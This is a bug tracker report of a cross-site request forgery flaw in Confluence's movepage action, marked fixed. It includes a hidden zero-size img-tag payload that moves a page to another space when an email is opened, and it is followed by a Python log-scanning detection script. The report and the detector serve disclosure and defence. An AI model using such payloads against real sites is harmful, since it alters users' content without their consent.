- Type: Bug
- Resolution: Fixed
- Priority: Medium
- Affects Version/s: 5.2, 5.3
- Component/s: None
Seems like you can easily move pages around spaces by just hitting the movepage action using GET, like this:
http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2
Malicious example of how to exploit this (in an email message):
<img src="http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2" style="height:0;width:0">
(after opening the email, the page has been moved to S2 space)
scary!!
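A detection sketch for the behavior reported above, added here as an example and not part of the original report or of Confluence's own code: it scans access logs for GET requests to movepage.action whose Referer is absent or off-site, which is what a remotely loaded image produces. The combined log format, the constructed sample lines, and the function name `suspicious_moves` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the proxy in front of Confluence writes "combined" format access logs.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
ACTION_PATH = "/pages/movepage.action"  # action named in this issue
SITE_HOST = "localhost:8080"            # host used in this issue's URLs

def suspicious_moves(lines, site_host=SITE_HOST):
    """Return one finding per GET to movepage.action not referred by the site itself."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith(ACTION_PATH):
            continue
        referer = m["referer"]
        ref_host = urlsplit(referer).netloc if referer not in ("", "-") else None
        if ref_host == site_host:
            continue  # request was referred by a page of the wiki itself
        query = parse_qs(url.query)
        findings.append({
            "user": m["user"],
            "time": m["ts"],
            "page_id": query.get("pageId", [None])[0],
            "target_space": query.get("spaceKey", [None])[0],
            "referer_host": ref_host,  # None: no Referer sent (common for mail clients)
        })
    return findings

# Constructed sample log lines (not real traffic).
SAMPLE = [
    '10.0.0.5 - alice [12/Mar/2014:10:01:02 +0000] "GET /confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.6 - bob [12/Mar/2014:10:02:00 +0000] "GET /confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2 HTTP/1.1" 302 0 "http://localhost:8080/confluence/display/S1/Home" "Mozilla/5.0"',
    '10.0.0.7 - carol [12/Mar/2014:10:03:00 +0000] "GET /confluence/pages/viewpage.action?pageId=787055 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.8 - dave [12/Mar/2014:10:04:00 +0000] "GET /confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2 HTTP/1.1" 302 0 "https://mail.example.com/inbox" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in suspicious_moves(SAMPLE):
        print(finding)
```

A same-site Referer is only a triage signal, so findings are a starting point for reviewing page history rather than proof in either direction.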